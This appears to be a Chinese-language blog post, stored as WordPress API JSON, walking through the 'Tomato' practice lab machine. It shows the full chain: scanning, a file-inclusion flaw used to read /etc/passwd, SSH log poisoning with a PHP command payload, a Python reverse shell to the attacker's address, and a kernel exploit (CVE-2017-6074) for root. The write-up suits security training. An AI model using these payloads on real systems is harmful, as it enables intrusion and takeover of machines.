{"id":125,"date":"2022-04-01T13:38:21","date_gmt":"2022-04-01T05:38:21","guid":{"rendered":"http:\/\/47.118.40.97:8082\/?p=125"},"modified":"2022-04-07T11:48:39","modified_gmt":"2022-04-07T03:48:39","slug":"tomato-%e9%9d%b6%e6%9c%ba%ef%bc%88%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e6%bc%8f%e6%b4%9e%ef%bc%89","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=125","title":{"rendered":"Tomato-\u9776\u673a\uff08\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff09"},"content":{"rendered":"<h2>\u4fe1\u606f\u6536\u96c6<\/h2>\n<h3>\u626b\u63cf\u5b58\u6d3b\u4e3b\u673a\u786e\u5b9a\u9776\u573aip<\/h3>\n<pre><code class=\"language-shell\">arp-scan -l\n\u6216\nnmap -sP 192.168.226.0\/24<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220331225511800.png\" alt=\"image-20220331225511800\" \/><\/p>\n<h3>\u626b\u63cf\u76ee\u6807\u4e3b\u673a\u5f00\u653e\u7684\u7aef\u53e3<\/h3>\n<pre><code class=\"language-shell\">nmap -sS -sV -p- -v 192.168.226.128<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220331225436113-16487384951241.png\" alt=\"image-20220331225436113\" \/><\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8bbf\u95eeweb\u670d\u52a1<\/h3>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220331225636145.png\" alt=\"image-20220331225636145\" \/><\/p>\n<p>\u672a\u66fe\u53d1\u73b0\u6709\u7528\u4fe1\u606f<\/p>\n<h3>\u7f51\u7ad9\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\">dirb http:\/\/192.168.226.133\n\u6216\npython3 dirsearch.py -u 192.168.226.133 -e*<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401111819590.png\" alt=\"image-20220401111819590\" \/><\/p>\n<p>\u7b2c\u4e8c\u79cd\u65b9\u5f0f\u672a\u80fd\u63a2\u6d4b\u51fa\u6709\u6548\u76ee\u5f55<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401111726322.png\" alt=\"image-20220401111726322\" \/><\/p>\n<p>\u8bbf\u95eeantibot_image\u53d1\u73b0\u5b58\u5728\u76ee\u5f55\u904d\u5386<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112106863.png\" alt=\"image-20220401112106863\" \/><\/p>\n<p>\u53d1\u73b0info.php\u662fphpinfo\u7684\u754c\u9762<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112140567.png\" alt=\"image-20220401112140567\" \/><br \/>\n<img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112200083.png\" alt=\"image-20220401112200083\" \/><\/p>\n<p>\u67e5\u770b\u9875\u9762\u6e90\u4ee3\u7801\u53d1\u73b0\u4e00\u4e32\u6587\u4ef6\u5305\u542b\u7684\u4ee3\u7801<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112259828.png\" alt=\"image-20220401112259828\" \/><\/p>\n<pre><code>http:\/\/192.168.226.133\/antibot_image\/antibots\/info.php?image=\/etc\/passwd<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401112504260.png\" alt=\"image-20220401112504260\" \/><\/p>\n<p>\u53ef\u4ee5\u8bfb\u53d6\u51fapasswd\u6587\u4ef6\u7684\u5185\u5bb9<\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\u88ab\u6c61\u67d3\u7684SSH\u65e5\u5fd7\u6765getshell<\/p>\n<pre><code class=\"language-shell\">ssh &#039;&lt;?php system($_GET[&#039;cmd&#039;]); ?&gt;&#039;@192.168.226.133 -p2211<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401113105319.png\" alt=\"image-20220401113105319\" \/><\/p>\n<p>\u8fd9\u6837<code>&lt;?php system($_GET[&#039;cmd&#039;]); ?&gt;<\/code>\u8be5\u7528\u6237\u5c31\u4f1a\u88ab\u8bb0\u5f55\u5230ssh\u7684\u65e5\u5fd7\u4e2d\u53bb<\/p>\n<p>ssh\u65e5\u5fd7\u5728<code>\/var\/log\/auth.log<\/code>\u4e2d<\/p>\n<p>\u5f00\u542fnc\u76d1\u542c<\/p>\n<pre><code class=\"language-shell\">nc -lvnp 3388<\/code><\/pre>\n<p>\u67e5\u770b\u76ee\u6807\u4e3b\u673a\u6709\u6ca1\u6709\u5b89\u88c5python<\/p>\n<pre><code>view-source:http:\/\/192.168.226.133\/antibot_image\/antibots\/info.php?image=\/var\/log\/auth.log&amp;cmd=whereis python<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401125910910.png\" alt=\"image-20220401125910910\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u76ee\u6807\u9776\u673a\u5b89\u88c5\u4e86python3\uff0c\u90a3\u5c31\u53ef\u4ee5\u5229\u7528python\u8fdb\u884c\u53cd\u5f39\u4e86<\/p>\n<pre><code>view-source:http:\/\/192.168.226.133\/antibot_image\/antibots\/info.php?image=\/var\/log\/auth.log&amp;cmd=python3 -c &#039;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.226.128&quot;,3388));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);&#039;<\/code><\/pre>\n<p>\u6210\u529f\u53cd\u5f39shell<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401130102991.png\" alt=\"image-20220401130102991\" \/><\/p>\n<h2>\u6743\u9650\u63d0\u5347<\/h2>\n<p>\u67e5\u770b\u64cd\u4f5c\u7cfb\u7edf\u5185\u6838<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401130403061.png\" alt=\"image-20220401130403061\" \/><\/p>\n<p>\u5efa\u7acb\u53ef\u4ea4\u4e92\u5f0fshell<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401133007522.png\" alt=\"image-20220401133007522\" \/><\/p>\n<p>\u5728\u7f51\u4e0a\u67e5\u770b\u5bf9\u5e94\u7684exp<\/p>\n<pre><code class=\"language-shell\">git clone https:\/\/github.com\/kkamagui\/linux-kernel-exploits.git<\/code><\/pre>\n<p>\u4e0b\u8f7d\u653b\u51fb\u4ee3\u7801\uff0c\u8fdb\u5165<code>linux-kernel-exploits\/kernel-4.4.0-21-generic\/CVE-2017-6074<\/code>\u76ee\u5f55\uff0c\u8fd0\u884c<code>compile.sh<\/code>\u6587\u4ef6<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401132504088.png\" alt=\"image-20220401132504088\" \/><\/p>\n<p>\u67e5\u770b\u751f\u6210\u7684exp<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401132551891.png\" alt=\"image-20220401132551891\" \/><\/p>\n<p>\u4f7f\u7528python\u5f00\u542f\u4e00\u4e2a\u4e34\u65f6http\u670d\u52a1\u5668<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401132645112.png\" alt=\"image-20220401132645112\" \/><\/p>\n<p>\u9776\u673a\u5207\u6362\u5230tmp\u76ee\u5f55\u4e0b\uff0c\u4e0b\u8f7dexp\uff0c\u5e76\u7ed9\u4e88\u6267\u884c\u7684\u6743\u9650<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401133431132.png\" alt=\"image-20220401133431132\" \/><\/p>\n<p>\u8fd0\u884c\u6587\u4ef6\uff0c\u63d0\u5347\u6743\u9650<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20220401133550158.png\" alt=\"image-20220401133550158\" \/><\/p>\n<p>\u6210\u529f\u62ff\u5230root\u6743\u9650<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4fe1\u606f\u6536\u96c6 \u626b\u63cf\u5b58\u6d3b\u4e3b\u673a\u786e\u5b9a\u9776\u573aip arp-scan -l \u6216 nmap -sP 192.168.226.0\/24 \u626b\u63cf\u76ee\u6807\u4e3b\u673a\u5f00 &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-125","post","type-post","status-publish","format-standard","hentry","category-9"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=125"}],"version-history":[{"count":4,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/125\/revisions"}],"predecessor-version":[{"id":203,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/125\/revisions\/203"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=125"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}